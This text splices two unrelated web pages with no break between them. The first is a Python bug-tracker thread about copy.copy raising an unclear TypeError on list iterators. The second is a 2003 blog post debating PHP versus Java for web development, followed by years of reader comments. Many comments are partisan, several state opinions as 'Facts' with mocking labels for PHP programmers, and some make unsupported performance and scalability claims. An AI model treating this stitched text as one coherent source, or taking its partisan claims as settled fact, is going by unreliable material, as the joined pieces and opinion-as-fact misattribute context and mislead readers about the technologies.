Python 2.7.2 (default, Jun 12 2011, 14:24:46) [MSC v.1500 64 bit (AMD64)]
Code:
import copy
copy.copy(iter([1,2,3]))
Exception:
---------------------------------------------------------------------------
TypeError Traceback (most recent call last)
T:\languages\Python27\Scripts\<ipython-input-2-4b0069a09ded> in <module>()
----> 1 copy.copy(iter([1,2,3]))
T:\languages\Python27\lib\copy.pyc in copy(x)
94 raise Error("un(shallow)copyable object of type %s" % cl
s)
95
---> 96 return _reconstruct(x, rv, 0)
97
98
T:\languages\Python27\lib\copy.pyc in _reconstruct(x, info, deep, memo)
327 if deep:
328 args = deepcopy(args, memo)
--> 329 y = callable(*args)
330 memo[id(x)] = y
331
T:\languages\Python27\lib\copy_reg.pyc in __newobj__(cls, *args)
91
92 def __newobj__(cls, *args):
---> 93 return cls.__new__(cls, *args)
94
95 def _slotnames(cls):
TypeError: object.__new__(listiterator) is not safe, use listiterator.__new__()
Either this is a bug or not a clear error message in the exception
I get a normal exception.
I see ipython at the top level in 'T:\languages\Python27\Scripts\<ipython-input-2-4b0069a09ded> in <module>()'
Perhaps you ran ipython accidentally?
@Ramchandra: I think you referring to the traceback format (which is indeed less useful than a normal Python traceback in the context of this tracker). The OP, however, is referring to the exception itself:
TypeError: object.__new__(listiterator) is not safe, use listiterator.__new__()
This is indeed a bit unexpected, though I don't know that copying iterators is actually supported.
C:\Users\Jakob>python -c "import copy; copy.copy(iter([1,2,3]))"
Traceback (most recent call last):
File "<string>", line 1, in <module>
File "T:\languages\Python27\lib\copy.py", line 96, in copy
return _reconstruct(x, rv, 0)
File "T:\languages\Python27\lib\copy.py", line 329, in _reconstruct
y = callable(*args)
File "T:\languages\Python27\lib\copy_reg.py", line 93, in __newobj__
return cls.__new__(cls, *args)
TypeError: object.__new__(listiterator) is not safe, use listiterator.__new__()
C:\Users\Jakob>python3 -c "import copy; copy.copy(iter([1,2,3]))"
Traceback (most recent call last):
File "<string>", line 1, in <module>
File "T:\languages\Python32\lib\copy.py", line 97, in copy
return _reconstruct(x, rv, 0)
File "T:\languages\Python32\lib\copy.py", line 285, in _reconstruct
y = callable(*args)
File "T:\languages\Python32\lib\copyreg.py", line 88, in __newobj__
return cls.__new__(cls, *args)
TypeError: object.__new__(list_iterator) is not safe, use list_iterator.__new__()
Pure python traceback. Just for clarity.
BTW, can we add support for copying iterators by using itertools.tee
Title corrected. Non-iterator iterables are usually easy to copy.
I think this is in the category of "don't do that" ;-)
I believe the idea of making iterators copyable has been rejected on one of the lists because it is probably not possible in general.
Tee consumes indefinite and unbounded space. Its use should be explicit. If a function needs to iterate more than once with an input iterable, it should explicitly do list(iterator) for iterator inputs.
See Raymond's comments, such as msg156720 in #14288.
So I suspect that raising an error for copy.copy(iter([])) is correct. The error message amounts to saying make a new instance with the class constructor. That is usually correct when copy is not possible, but not in this case. ListIterator.__new__ is the inherited object.__new__. It appears that ListIterators can only be constructed by list.__iter__. But I doubt that the code that raises the error message can know that.
But perhaps the error message can be improved anyway.
Before anyone else rushes of to do this, can I? I really want to break into python-dev and this might be my chance.
Please, give it a try. But also be prepared for it being harder than it looks; the problem is that there may be very limited knowledge available where the error is generated. (I don't know; I haven't looked at the code and am not likely to...I usually leave reviews of C code to our C experts.)
Actually the tp_new field of list iterator class is NULL. Unpickler raises other error in such case (see issue24900 for example).
UnpicklingError: NEWOBJ class argument has NULL tp_new
Backported to 2.7 the part of the patch for issue22995 fixes this issue.
>>> copy.copy(iter([]))
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/home/serhiy/py/cpython-2.7/Lib/copy.py", line 88, in copy
rv = reductor(2)
TypeError: can't pickle listiterator objects | https://bugs.python.org/issue14350 | CC-MAIN-2020-50 | refinedweb | 786 | 61.22 |
PHP vs. Java - which is better? I have a former client that has a customer. This customer asked them - "so when are you migrating from Java to PHP?" So evidently this person has the impression that the next wave of web applications will be written in PHP. My former client has asked me to provide an answer for their customer. If I translate it, I think they mean to ask "what is different between Java and PHP and why should we use Java over PHP?" Here are my opinions - please add yours as you see fit. I must admit I don't know a whole lot about PHP, except that it's widely popular among the Linux/Apache/MySQL crowd and that it's similar to ASP in its lack of an MVC architecture (yes, I know about the PHP MVC project).
- I think Java is more of an industry standard, whereas PHP seems to be popular among hackers and hobbyists.
- Java provides better separation of layers - key for testability. PHP has all the code embedded in the page, so you have to run it through a browser to test if database connections work (for instance).
- Java is more scalable.
- More folks know Java and it's easier to qualify someone's Java skills. How do you test someone knows PHP? Is there a certification?
- More for-profit organizations use it.
If you're a Java or a PHP-lover, I'd love to hear your opinions (facts are always better). I'm going to point my client to this post, so keep it clean.
Posted in Java
at Aug 22 2003, 03:52:33 PM MDT
Posted by Layton on August 22, 2003 at 05:23 PM MDT #
Posted by Damien Bonvillain on August 22, 2003 at 05:44 PM MDT #
Posted by Chris Davies on August 22, 2003 at 06:50 PM MDT #
Posted by rich! on August 22, 2003 at 07:15 PM MDT #
I do agree that Java provides for a much greater separation of layers, although there are some neat templating systems for PHP (Smarty, for example). JSP with taglibs is OK, but Struts/Webwork/etc provide fantastic architectural support. Even with extensive use of PHP's object model, you are still tied to scripts (which you can include and reuse, but it gets messy reasonably quickly). With proper separation, testing in Java is a breeze. I use Webwork, and I can test Actions with JUnit directly from Eclipse. I test my data tier directly as well. I can't see how you can test PHP outside of the server environment (unless you move to a command-line PHP interpreter?)
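The "test Actions directly" point can be sketched like this - a hypothetical, minimal action class (illustrative names, not the real WebWork API), checked with plain assertions rather than a full JUnit setup:

```java
// Hypothetical WebWork-style action (names are illustrative): the business
// logic lives in a plain class, so it can be exercised without ever
// starting a servlet container.
class LoginAction {
    private String username;

    public void setUsername(String username) { this.username = username; }

    // Returns a result code the framework would map to a view.
    public String execute() {
        return (username != null && username.length() > 0) ? "success" : "error";
    }
}

public class LoginActionTest {
    public static void main(String[] args) {
        LoginAction action = new LoginAction();
        action.setUsername("matt");
        if (!"success".equals(action.execute()))
            throw new AssertionError("expected success");

        // No username set: the action should report an error result.
        if (!"error".equals(new LoginAction().execute()))
            throw new AssertionError("expected error");

        System.out.println("all checks passed");
    }
}
```

In a real project the same idea is driven from JUnit, but the essence is that the action is just a Java object you can construct and call.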
Scalability is a whole other f*cking can of worms. Yahoo selected PHP for their systems, other companies use Java (parts of eBay, Dell). Any system (within reason) can be made to scale ... I have scaled ASP/VBscript on IIS. Get some routers, buy a bunch of web servers and the biggest database you can afford.
Testing developer skills is a challenge regardless of the language. Certification is no real indication of expertise, just an indication of passing an exam (and keep in mind that if you get 50% and pass, it is also another way of saying that you know HALF of the subject material). I cannot comment on the numbers of developers, but in my experience finding quality Java people can be a challenge (finding people who have touched Java is easier).
Personally I think that language is just one of the many factors that need to be considered when designing a system, and they should be subsidiary to the business case.
Posted by Toby Hede on August 22, 2003 at 07:25 PM MDT #
Posted by No one on August 22, 2003 at 08:02 PM MDT #
Toby and "No one" are both correct. One of the things that "No one" missed was that the install base of PHP on webhosts is HUGE. Far greater than Java. I would like to add a couple of things that I have noticed from my experience with PHP and Java. I currently have two deployed PHP web applications that I have to maintain. I also have three java web application that I maintain.
PHP is such a headache that I would NEVER suggest to a client that a web application be written in PHP. "No one" is correct about installation. If you don't have PHP installed with Apache, you are in for a long ride. Nothing can beat the installation of Orion. Unzip. java -jar orion.jar. Instant Java web app.
Database access has not been standardized. Every database has its own set of functions, and they are not always named or perform the same type of functions. Oracle's functions are so different it boggles the mind.
PHP has OOP, but it is not like any other OOP I have ever used.
PHP's XML support is antiquated. No JDOM for PHP.
PHP is a mish-mash of functions that have been thrown together in one library without any care given to convention or standards. Just check out the number of functions that have been written for arrays: Array Functions and notice that some begin with array_ and some don't. Session handling in PHP is a real pain as well.
PHP does have a couple of pluses. It is easy to learn. The documentation is good and in one place. There are a bazillion scripts that are already written. There are a bazillion web hosts that already have it installed.
Can things be done "correctly" in PHP? Yes. But once your developers learn how to do things correctly, they will be asking for Java. When they overload a function, they will not want to count the number of parameters that were passed to determine which function should actually be called. They will tire of trying to avoid the circular includes. They will tire of the constant ftp to the server to test out the latest changes. And they will want a real IDE.
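For contrast, the overloading mentioned above is resolved by method signature at compile time in Java - no counting of arguments needed (a minimal sketch; in PHP 4 a single function would have to inspect func_num_args() and branch manually):

```java
public class Greeter {
    // Two methods with the same name but different signatures:
    // the compiler picks the right one from the call site.
    static String greet() {
        return "Hello";
    }

    static String greet(String name) {
        return "Hello, " + name;
    }

    public static void main(String[] args) {
        System.out.println(greet());        // Hello
        System.out.println(greet("Ana"));   // Hello, Ana
    }
}
```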
I suggest using PHP to learn the fundamentals of web based applications. Use Java to actually build systems.
Here is an article discussing why a largish hardware site switched from PHP to Java. It discusses the virtues and vices of multithreaded (Java) and multiprocess (Apache/PHP) systems.
Posted by Carl Fyffe on August 22, 2003 at 08:55 PM MDT #
Posted by Marc Adams on August 23, 2003 at 09:49 AM MDT #
Posted by Ale Sarco on August 23, 2003 at 03:08 PM MDT #
Posted by Joshua Hoover on August 23, 2003 at 10:29 PM MDT #
Posted by csshsh on August 24, 2003 at 10:38 AM MDT #
You can isolate a class of web "applications" where you feel that Java is overkill; PHP fits this niche.
Posted by Damien Bonvillain on August 24, 2003 at 02:51 PM MDT #
Posted by Adam Vandenberg on August 25, 2003 at 01:42 PM MDT #
Posted by Olivier Rossel on August 26, 2003 at 07:09 AM MDT #
Posted by Damien Bonvillain on August 26, 2003 at 04:14 PM MDT #
Posted by Paul Rivers on August 29, 2003 at 07:30 PM MDT #
Posted by Dianne Schoenberg on August 30, 2003 at 07:23 PM MDT #
Posted by Dhananjay Nene on September 03, 2003 at 01:49 PM MDT #
Posted by Oliver Tseng on September 12, 2003 at 09:27 AM MDT #
Posted by Michael on October 28, 2003 at 09:14 AM MST #
Posted by bubba on March 24, 2004 at 11:11 PM MST #
Posted by kok koon leong on May 06, 2004 at 11:35 PM MDT #
It addresses many of your gripes about PHP in respect to Java. That leaves you with a very rapid development language and still logical code reuse and separation of layers.
It also has a component event cycle similar to .NET, which provides a very simple suggested coding standard.
-Jackson
Posted by Jackson on July 16, 2004 at 03:14 PM MDT #
Posted by Nick Parca on September 29, 2004 at 01:04 PM MDT #
My primary focus includes scalability, true object orientation and performance. Other factors: We are currently all MySQL but want to migrate to Oracle, we see anywhere from 30-80K surfers per day depending on the season, and I must create an upgrade path that blends in with the existing system - I will not have the luxury of a "Next Release Cutover" scenario. All communication is performed between systems via HTTP with XML as the interaction language - that being said, I still need to communicate with a variety of other systems using and equally wide variety of protocols (merchant processing, currency conversion, GeoIP et al...). There are no proprietary forms/apps/methods that talk to the system, everything is done via HTML. As an aside, I would REALLY not like to go to two languages, provided I can do this without breaking my "Best tool for the job" ethos. Any coder worth his/her salt can learn a language/framework given some space, so the ramp up time is considerably less important than the result (Frankly, I think the zealotry in several previous posts demonstrates more about one-trick-pony coders than architecture and framework effectiveness).
My immediate experience is that a Tomcat/JBoss deployment has a bunch of overhead that seems to be less than exciting from a performance perspective, but I am concerned about PHP systems not being built from a class hierarchy (I love the Delphi model where everything descends from TObject...). I would really enjoy seeing both a Java and a PHP expert argue why I should go with their platform. Clearly, Yahoo and Friendster think that PHP is the way to go, but the list of J2EE folks is getting huge.
Thanks for the space,
-EP</font>
Posted by Ed Purkiss on December 09, 2004 at 11:39 AM MST #
I think you can equally use PHP and Java for the same purposes. You can create extensive applications with both PHP and Java. The whole problem is the reputation of PHP. Sure, there are things you can't do with PHP, and surely that works both ways.
Currently I am developing a PHP framework in PHP 5 that is completely class-based and communicates only using XML. PHP CAN be used to make very clean, reusable and maintainable software, BUT the level of discipline needed to do that is WAY higher than in Java. The rules you must set for yourself are harsh and you must abide by them strictly; otherwise your PHP app will degrade very fast into a bunch of scripts that are not very useful.
Posted by Quinn on December 16, 2004 at 08:39 AM MST #
Posted by Michael Clayton on January 25, 2005 at 04:34 PM MST #
I'd like to comment on Permalink's original article:
>>I think Java is more of an industry standard, whereas PHP seems to be popular among hackers and hobbyists.
This is not a reason to do anything. Don't do stuff because others are doing it, that's for lambs. Do what you must. In fact, choosing technology X when your competition is using technology Y might be a competitive advantage (or it may be a fatal flaw - depends on what are you choosing over what).
>>Java provides better separation of layers - key for testability. PHP has all the code embedded in the page, so you have to run it through a browser to test if database connections work (for instance).
True to some extent, but that depends more on how do you design your PHP-powered system. If, for example, you keep all your database abstraction layer separate, you can test separately.
You can also use Smarty or other template systems to completely separate code from display, so you can have programmers write PHP code and web designers write HTML/CSS, change look or behavior separately, etc.
>>Java is more scalable.
Not true. Java applications tend to be state-based. PHP applications are stateless. It's far easier and cheaper to set up an array of very cheap (even second-hand!) PCs running Linux+PHP than Java clusters. PHP is scalable right away; you don't have to design your applications to be so!
>>More folks know Java and it's easier to qualify someone's Java skills. How do you test someone knows PHP? Is there a certification?
There are PHP certifications, check out Zend's website. Java is, indeed, more widely known (although this is changing), but PHP is ridiculously easy to learn as opposed to Java. Besides, any Perl programmer will find it very easy to learn PHP, and Java/C/C++/C-like language programmers already know the syntax.
>>More for-profit organizations use it.
See my first comment.
IMO, Java will be better (and perform better) for very large applications, but elsewhere, I wouldn't doubt using PHP, for the following reasons:
1. It's far more productive than Java, and I mean far more. What takes 10 hours to develop in Java, you can easily do in 1 hour in PHP. Time is money. This alone makes me like one language over another.
2. It follows the KISS principle, as opposed to Java, which tends to produce bloatware and blOOatware.
3. This is part of the reason for points 1 and 2, but it deserves special mention: the PHP APIs are simple and productive, unlike Java's blOOated, cumbersome, needlessly complicated APIs. It's so overgeneralized you can't do anything quickly. It pretends to solve so many problems it doesn't solve anything easily. You can't possibly memorize all that and be productive with it. Think parsing a URL. In Java you have to create a new object and call methods with illogical names to do it. In PHP, all you have to do is call ONE function - parse_url - then simply access whatever you want as a hash, using the names you actually know and use everywhere, like port or host.
4. It's cheaper. Any cheap Celeron with 100% free software will be a great PHP server for a site/web application with tens of thousands of hits a day! As you need more power, scalability will be cheaper and simpler too - but there are few things a dual Xeon with PHP won't take! PHP can be ridiculously fast for small to medium-large applications in real environments.
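The URL comparison in point 3 can be illustrated from the Java side - a minimal sketch using java.net.URL, whose accessors mirror the keys (host, port, path) that PHP's parse_url returns as a hash:

```java
import java.net.MalformedURLException;
import java.net.URL;

public class UrlParts {
    public static void main(String[] args) throws MalformedURLException {
        // In Java you construct a URL object, then call accessor methods
        // for each component; parse_url in PHP returns them all at once.
        URL url = new URL("http://example.com:8080/path?x=1");

        System.out.println(url.getHost());  // example.com
        System.out.println(url.getPort());  // 8080
        System.out.println(url.getPath());  // /path
    }
}
```

Whether the extra object and accessor calls are "cumbersome" or "self-documenting" is, of course, exactly the dispute in this thread.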
Posted by Wiseman on May 15, 2005 at 09:22 AM MDT #
Posted by liam on July 20, 2005 at 08:34 AM MDT #
Posted by Labros on May 02, 2006 at 07:42 PM MDT #
PHP is pretty damned easy to install.
1. Install Apache
2. Install PHP with the windows installer
3. Add PHP's apache configuration lines. All 3 of them.
4. Restart apache.
Database access is now standardish. You have PDO (PHP Data Objects), PEAR::DB, and Zend_DB. Any of these options allow you to connect to any kind of database and go.
PHP has OOP. PHP doesn't (yet) have namespaces. It fits very well, barring that.
PHP now has SimpleXML. XML in PHP is easy.
A few other of Carl Fyffe's comments niggle me.
> They will tire of trying to avoid the circular includes.
PHP has had require_once, include_once forever. If you don't know about those, you haven't RTFM.
> They will tire of the constant ftp to the server to test out the latest changes.
It's too hard to set up your own apache + php installation? Four steps!
> And they will want a real IDE.
Maybe. I can't stand the damned things. My coworkers all use Zend Studio, and it's alright. The only thing it gives you is the ability to tab complete, and shorthand code completion. The rest... well the rest can be done with a decent text editor and a collection of command line applications. PHPUnit, ZendCodeAnalyzer. Doxygen.
The beauty of not using an IDE means you stay focused, your functions/classes/methods HAVE to be easy to remember and make sense, and if you don't KISS you dig your own grave. PHP used like that results in a very handy tool.
Posted by Daniel O'Connor on August 24, 2006 at 01:05 AM MDT #
Posted by someone on October 20, 2006 at 03:11 PM MDT #
Posted by DHIRAJ PATRA on November 30, 2006 at 03:21 AM MST #
Posted by david on December 03, 2006 at 02:44 AM MST #
I think Java and PHP are for different things. I have been a Java programmer since 1997. I do coding on my job and make a living with it. Recently, I wanted to create a website for kids' math, I couldn't find a good open source java package for it. I searched on the web and found there are many good open source PHP packages there that may be good for the purpose.
I spent a month (a couple of hours each day) on creating with Drupal. I think Drupal is well suited for the job. I don't believe I could do it in Java.
Java may be just for so-called enterprise applications -- companies hire high-paid Java programmers for their good or bad systems.
Posted by Paul Z. Wu on December 04, 2006 at 01:34 PM MST #
Posted by kiran on January 09, 2007 at 06:00 AM MST #
Posted by Man'z on January 16, 2007 at 02:08 AM MST #
Posted by MG on February 05, 2007 at 11:07 PM MST #
Posted by me on May 24, 2007 at 07:13 AM MDT #
Posted by peter_kosmas on September 04, 2007 at 07:11 AM MDT #
Posted by Lox on September 12, 2007 at 06:44 AM MDT #
Posted by bluejay on September 18, 2007 at 04:24 AM MDT #
Posted by Amir Ali Tayyab on October 10, 2007 at 02:24 AM MDT #
Posted by Madis on October 16, 2007 at 09:58 AM MDT #
Posted by David Hill on October 25, 2007 at 11:59 PM MDT #
Posted by Iwan on November 04, 2007 at 03:58 PM MST #
I'm migrating from J2EE to PHP. I think PHP is:
- more scalable;
- simpler and faster;
- fast to develop.
The customers always ask for a site with good performance, and Java is not the right choice.
Posted by mike on January 22, 2008 at 04:20 AM MST #
The truth is: many people using php don't have any clue about java and many people using Java don't have any clue about php but both are quite the same in a web context with a few things that make them more liked in different situations.
I personally believe as i'm a php guy that php is a much better choice for any web app/site needs, just because it has been a great part of my experiences while the few experiences i had with java were about highend big company webapps built in the early 2k. I'll try to say a few things about what i know better, wich is php:
-php isn't a pure oo language, wich imo is the main reason why many php apps are faster than any java concurent (because java object model and framework is so rich that it's just oversized as a response to web's small needs)
-php let the developpers do as much mistake and design errors as they want. This is actually a big advantage because it also means it's easier to learn for the beginners and that doesn't means that an experienced developper will engineer a bad an lacking performance or maintenability code.
-php offers a response to most of the needs one can have. Including offline and asynchronous tasks and permanent session (that would be with some work done with the operating system but still it's not a really hard thing to obtain) as i see it those 2 are the main reasons for an enterprise to go the java way in a web based application.
-php is widely available and used over the web, much more than java and increasing, there isn't much more to say here that's just a fact with natural consequences to expect.
Now as i see it, java has been created to handle domotic needs in the first place and still is a common used language in many industrial companies, like cars etc, that isn't imo a domain php is suited for, even for traditional heavy client market java is much more used than php will probably ever be. Php has a big advantage on the web mostly as it is used in apache as a module zeroing any VM launch time, but in any other context Java and php both take time to run comparing to any compiled program, as far as i'm concerned i see no problem saying java is better than php when it comes to anything but web things, i could mention tho, that there is a lot better than java there with C++ or C but that is another troll i guess :)
Posted by 41.208.139.136 on January 22, 2008 at 10:58 AM MST #
As you said...
* "I think Java is more of an industry standard, whereas PHP seems to be popular among hackers and hobbyists."
-- I believe Java is more popular among the industry players who can afford big bucks, while PHP (PHP: Hypertext Preprocessor), in my opinion, is most popular among web applications.
I personally used both Java and PHP for the same web application and found PHP processing the data much faster than anything else among nearby competitors.
Regarding security, I do not think Java, ASP or PHP can be 100% secure once the door to the internet is opened by connecting to the World Wide Web. When no one can guarantee a 100% secure or bug-free version, why not go for open source?
* "Java provides better separation of layers - key for testability. PHP has all the code embedded in the page, so you have to run it through a browser to test if database connections work (for instance)."
-- Not necessarily; PHP code does not have to be embedded in the web page, as PHP has a choice between the include() and require() functions.
* "Java is more scalable."
-- Personally, I could not find anything PHP cannot do that Java can do. But, as a matter of fact, I could not find any Java-based online shopping-cart application which is fast and popular.
* "More folks know Java and it's easier to qualify someone's Java skills. How do you test someone knows PHP? Is there a certification?"
-- PHP runs on the Zend Engine. Zend offers PHP certification, and Zend was founded by Zeev Suraski and Andi Gutmans; Rasmus Lerdorf invented PHP.
* More for-profit organizations use it.
-- If we look at the statistics provided by third parties, PHP installations on web servers keep increasing day by day because of more than one factor. One factor is that it is easy to learn: the syntax is very similar to C++ and Java. Plus, it's a really fast interpreted language.
Posted by SID TRIVEDI on February 10, 2008 at 11:42 PM MST #
Posted by rajeev on March 03, 2008 at 04:16 AM MST #
Posted by Ben on March 12, 2008 at 06:44 AM MDT #
Posted by prabhat on March 31, 2008 at 05:38 AM MDT #
Posted by maharba on April 01, 2008 at 07:07 PM MDT #
Posted by random on April 24, 2008 at 02:43 PM MDT #
Posted by Manju chauhan on May 14, 2008 at 02:36 AM MDT #
Posted by Manju chauhan on May 14, 2008 at 02:37 AM MDT #
Lots of *very* insightful comments. I will now add my own:
I drank too much Java. Now I have to PHP.
Goodbye, you self-serious clods!
Posted by all i know on May 23, 2008 at 02:30 PM MDT #
Posted by Extenders on August 11, 2008 at 01:25 AM MDT #
Posted by Bob on August 12, 2008 at 08:59 AM MDT #
Posted by raj on August 17, 2008 at 11:18 AM MDT #
Posted by raj on August 17, 2008 at 11:19 AM MDT #
Posted by raj on August 17, 2008 at 11:20 AM MDT #
Posted by raj on August 17, 2008 at 11:31 AM MDT #
Posted by adwin wijaya on September 17, 2008 at 05:12 AM MDT #
Posted by adwin wijaya on September 17, 2008 at 05:15 AM MDT #
Posted by Nehatha on October 16, 2008 at 04:30 AM MDT #
Fact 1:
PHP programmers are by far the worst programmers of all. No other programmers have the capacity to produce gazillions of terribly mediocre scripts as PHP programmers do.
Fact 2:
PHP is easy to learn. That's its strength, and therein lies its weakness too, because every hippy with a notepad can write PHP code and get the instant gratification of being able to echo out HELLO WORLD in a minute or so.
It also means these same hippies are the ones who, after writing a few extra lines of code, consider themselves programmers and start up their own blogs to share their knowledge of PHP via tutorials and scripts, and litter the internet with criminally mediocre code.
There's nothing more terrible than seeing a whole page being built with PHP ECHO statements,
e.g. echo "<HTML><HEAD>.......". And that's exactly what hippies do when they realise they can use PHP to actually output html too. You see, hippies are not aware of the benefit of separating applications into layers for manageability, maintainability and flexibility. Hippies do live in their own world, you see....
Fact 3:
Zend framework is crap. there I said it.... And it comes out of a company run by the inventors of PHP. Though I tried so many times, I just can't seem to bring myself to use it....
Fact 4:
In fact pretty much all PHP frameworks are crap.
Fact 5:
Pretty much every JAVA frameworks suck too. :-)
Fact 6:
All the improvements that get put into new releases of PHP are just a catch-up game with Java.
Fact 7:
Any language that doesn't have native support for namespaces is a language for amateurs :-)
Fact 8:
PHP can't do everything Java can, not by a long shot. Multithreading?? Hello! Try writing an applet :-)
Fact 9:
I like Java and I like PHP too. But if someone tries to tell me PHP is better than Java or PHP is on par with Java, I always beg to differ. It's like comparing a bicycle with a car..... not quite, but close :-)
Fact 10:
Netbeans has released a FREE IDE for PHP. It's got all the great features like code completion, syntax highlighting, marking of occurrences, refactoring, code templates, pop-up documentation, easy code navigation, editor warnings, a task list, as well as a debugger.
Fact 11:
Netbeans is a product of Sun Microsystems. Yes, hippies, that's right, they are the folks that gave you Java, and now they are trying to turn hippie PHP programmers into real programmers by providing a productivity tool with a standard project structure and heaps of goodies to make PHP software development so much better.
Fact 12:
The Zend IDE from the hippies that brought us PHP is a commercial tool, and even then it sucks big time. I haven't even started on the commercial Accelerator that Zend provides to speed things up in PHP, and why greed is a bad thing for hippies and why such greed only harms the cause of PHP as a language.
Fact 13:
Facts 11 & 12 point to the fact that the Java community is making a greater contribution to PHP than the hippies that run Zend.
Fact 14:
The Netbeans PHP IDE is the best thing to happen to PHP programmers since sliced bread.
Fact 15:
If you don't like the Netbeans PHP IDE, you're a hippie!
Fact 16:
I have to admit, I like PHP too. I program in both languages and I can switch between them with equal ease. Not only that, I sometimes use a combination of both to get things done. And both Java and PHP programmers might find it horrifying, but I like JavaScript too. I like to write language-agnostic web applications. I use a lot of JavaScript and a good database domain model. If you have a rich set of JavaScript libraries and a well-designed database model, the server-side language merely acts as a service layer..... and I can throw away PHP and use Java when I need Java's power and flexibility, without rewriting my whole application.
Posted by anjan on October 21, 2008 at 08:42 PM MDT #
Posted by Gabriel on November 06, 2008 at 01:02 PM MST #
Posted by anjan on November 13, 2008 at 06:36 PM MST #
Thanks to all of you for your contributions (except for the very few that are obviously jerks).
Java vs PHP is a debate that is here to stay. The reason I am looking at this page is that I got sucked into a large Java project and I have found it absolutely, incredibly hard to do stuff that in PHP is quite simple: mysql_fetch_array in PHP, for instance, vs no such thing in Java, unless I've been looking in all the wrong places.
I've done a lot of programming, from assembler to C, PHP, BASIC and a whole slew of other languages, but I do not remember anything quite as 'verbose' as Java code. It looks like classes are endlessly repeating chunks of code that are handled quite easily by utility functions in other languages but which are either not present in Java or nearly impossible to implement. Portability seems to be another issue: switching from 'resin' to 'tomcat' caused all kinds of build issues, changing a single class and redistributing it requires a server shutdown, and so on.
I'm sure I'm still doing lots of stuff 'wrong' from the Java point of view, but I have a feeling that PHP has improved a lot in the last few years whereas Java has more or less stood still when it comes to doing web development.
I'll keep revisiting this thread from time to time to see what else comes up, it sure has been an interesting read.
And now back to java coding :(
j.
Posted by Jacques Mattheij on December 28, 2008 at 05:03 PM MST #
Posted by Cifar24 on January 25, 2009 at 02:45 PM MST #
I purely agree that PHP will be the language of the next generation of web development. I've been a hard-core Java developer for years, but now I'm designing a site for which I had to learn PHP. After building a few pages with PHP, I've seen there is a lot of reduction in development time compared to Java, and PHP is faster than Java at times (no VM required for PHP).
In terms of scalability, PHP scales more than Java (I read it in a recent study article published by the architect of XML and co-founder of OpenText). Java is next to PHP in scaling, but yes, maintaining PHP files is a bit more confusing than Java packages. Unless you are developing web apps for a company which has its own dedicated server and its own resources, I would say PHP will be the better choice.
Posted by Kailashnath on February 16, 2009 at 02:36 AM MST #
Posted by Raja S Patil on April 17, 2009 at 03:13 AM MDT #
Posted by Ryan on April 19, 2009 at 08:48 AM MDT #
Posted by Ryan on April 19, 2009 at 08:49 AM MDT #
Posted by Ryan on April 19, 2009 at 08:51 AM MDT #
It is possible. Java has the syntax to do that.
-- Also, it's fast to develop in. Whereas in J2EE, you'd have to compile, deploy, wait for JSP to compile (if you didn't precompile them beforehand) and then you can test it
-- It took me some time to figure out how to use servlets and jsp but only a few minutes to hack out a php script.
If you compare just a PHP script with a JSP script, then the learning curve will be just about the same. And with the extension libs from Apache Commons, it will be as easy to use JSP as PHP.
-- Java has a slow start up and requires more from the client's computer, as php is server side only and gives client a maximum ease of access
Hi, I think you miss the point. Both J2EE and PHP are used for server-side programming and send only client-side code like HTML and JavaScript to the browser. Most people here did not mention Java applets, as they are mostly used for thick-client purposes.
-- php isn't a pure oo language, wich imo is the main reason why many php apps are faster than any java
Sounds logical. But does that mean anyone who uses OO in PHP 5 will experience slower responses, comparable to Java?
Posted by Ryan on April 19, 2009 at 08:53 AM MDT #
Posted by pankaj on April 20, 2009 at 03:04 AM MDT #
Posted by Shah on May 30, 2009 at 09:49 AM MDT #
Posted by Shah on May 30, 2009 at 09:50 AM MDT #
Posted by Shah on May 30, 2009 at 09:51 AM MDT #
Posted by Tadas on November 30, 2009 at 10:56 AM MST #
Posted by kirk bushell on March 18, 2010 at 06:50 PM MDT #
Posted by rakesh on April 19, 2010 at 09:50 PM MDT #
Posted by Ali on April 23, 2010 at 04:30 PM MDT #
Posted by Ali on April 23, 2010 at 04:31 PM MDT #
Posted by Ivan Ganev on May 03, 2010 at 02:06 AM MDT #
How can you compare the Hypertext Preprocessor with a compiled language? So your next comparison should be: JavaScript versus C++! Which one is better for web apps?
So Java is for developing any cross-platform application. PHP is for developing websites.
Yes, you can do websites using Java, just as you can walk on the beach wearing ski boots :)
I worked for one big company for 6 months, so I'd say: that company is developing lots of webapps and websites, all of them using Java. Why? Because they can hide the code from the customer; even if the client decompiles the app, they cannot reuse it in a simple way. And as far as I remember it was painful for us, and almost everyone asked: why not in PHP?
The funniest part was: the company website was written in PHP ;)
Posted by daniel on May 07, 2010 at 04:52 AM MDT #
Posted by Matt Raible on May 07, 2010 at 10:28 AM MDT #
Posted by Yogesh on June 13, 2010 at 11:00 PM MDT #
Posted by Anirudha on August 19, 2010 at 06:02 AM MDT #
Great comments. It's pretty easy to identify the PHP'ers who don't really have the capacity to understand true application requirements. And you Java guys who haven't really used PHP commercially and just glossed over the feature list, you ain't much better at comparing the two.
But I can honestly say I'm qualified to make a point: 10+ years' experience building internet apps of ALL types. I started with PHP4 back in the day and built many an app and administration system (50+). PHP was fine while the job was small.
Then I evolved into Java, which is now the bread and butter. Built real apps, multi-tiered, distributed, cached to the shit, for some of the bigger brands in the country. And it is the shit... if the client wants it, it can be done in Java.
But I'm not gonna pointlessly highlight the pros and cons of each. They're both bloody good at what they do, which is why so many of you are red-faced defending your babies... as you should.
However the question is, which do you recommend to the client?
Well... the answer is... WHAT KIND OF CLIENT DO YOU HAVE?
Both will do the job, BUT, if your client is a notorious tight-arse who bitches and moans about every cent they spend regardless of the bigger picture, and the job isn't massive, go with PHP. You'll be able to get devs, and if they are half decent they will occasionally deliver on the promises they gave with naive arrogance.
But if the client is willing to invest, has realistic expectations, has priorities squarely focused on long-term goals, and hopes to build on their investment over time, go with Java. By committing to Java you're generally agreeing to a more structured approach, not just in code (which a few of you clearly still think is all that matters), but also a more structured build process, with some sort of actual methodology, architectural consideration and design phase, documented requirements and signoff points.
At the end of the day the client needs some sort of assurance before the nerds start bashing out code, whatever language they choose. So make sure whoever you hire is not the sort of amateur that spends all day on forums blindly defending the only programming language they know!
Posted by ExperiencedDude on September 01, 2010 at 09:42 PM MDT #
Posted by OneComment on November 11, 2010 at 10:14 AM MST #
HipHop for PHP transforms PHP source code into highly optimized C++. It was developed by Facebook and was released as open source in early 2010.
Facebook sees about a 50% reduction in CPU usage when serving equal amounts of Web traffic compared to Apache and PHP. Facebook's API tier can serve twice the traffic using 30% less CPU.
Posted by 121.97.136.228 on April 22, 2011 at 08:12 AM MDT #
I would suggest you check the following PDF for your answer
